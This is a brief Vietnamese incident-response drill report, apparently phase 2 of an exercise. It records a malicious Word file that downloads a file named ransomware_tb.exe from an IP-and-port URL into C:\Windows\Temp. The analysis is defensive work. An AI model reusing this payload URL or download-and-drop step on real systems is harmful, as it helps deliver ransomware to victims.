Drill_TTTTBacNinh báo cáo phase 2
Đã cô lập In và cho phép remote qua port 3889
Phân tích khi click vào file word phát hiện link đến đường dẫn sau chứa virus tải về ổ C
SourceName = "http://118.70.80.143:4448/ransomware_tb.exe"
Destination = "C:\Windows\Temp\ransomware.exe"